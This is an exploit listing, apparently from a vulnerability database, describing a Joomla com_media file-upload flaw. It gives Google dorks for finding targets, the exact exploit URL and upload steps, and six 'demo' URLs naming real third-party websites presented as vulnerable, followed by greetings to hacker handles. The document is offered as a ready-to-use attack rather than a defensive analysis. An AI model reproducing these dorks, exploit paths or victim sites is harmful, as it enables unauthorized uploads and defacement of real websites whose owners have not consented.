Joomla com_media Upload Vulnerability

2017.02.18
de Ashiyane Digital Security Team (DE) de
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/component/media/ and inurl:/index.php/component/media/

####################################################### ##################{In The Name Of God}################# ####################################################### ############################################ # Exploit Title: Joomla Media Upload Vulnerability # Date: 2017 | 18 | February # Author: Ashiyane Digital Security Team # Vendor Homepage : https://www.joomla.org # Version: All Version # Tested On : Windows 8 / Chrome ############################################ ######## # Google Dork 1 : inurl:/component/media/ # Google Dork 2 : inurl:/index.php/component/media/ ######## ######## # exploit => /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= # # then => http://www.site.com/[path]/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= # # select => Select the "Upload file"> Choose Files And : Uploaded File URL: site.com/images/[filename] # # ( We Can Upload Files With This Formats : txt - jpg - png - gif) # # after file upload you able to see file in the path => http://site.com/[path] # ######## ######## # Demo 1 : http://www.personcentredplanning.eu/index.php/component/media/?view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author= # # Demo 2 : http://www.restaurantportocolom.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= # # Demo 3 : http://europeanaffairs.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= # # Demo 4 : http://www.reach.org.sg/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= # # Demo 5 : http://www.mansfield.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= # # Demo 6 : http://www.stepstograce.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= ######## [+][+][+][+][+][+][+][+][+][+][+][+] Discovered By : Cyber.Defacer [+][+][+][+][+][+][+][+][+][+][+][+] *=============================================================| | Special Thanks To : Behrooz_Ice، Virangar ,H_SQLI.EMpiRe ، Ehsan Cod3r ، | Und3rgr0und ، Amir.ght ، xenotix، modiret، V For Vendetta ، Alireza ، micle | r4ouf ، Net Hacker ، Spoofer ، alcol ، 1TED ، H4554N، shahroukh، Saeid_9n ، | F.SQLi ، Muts ، HackFans، B14CK SPID3R ، MALWaRE43 ، moh3nra021 , Sha4yan , M.R.S.L.Y | And All Of My Friends ... *=============================================================|


See this note in RAW Version
Vote for this issue:
33%
67%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top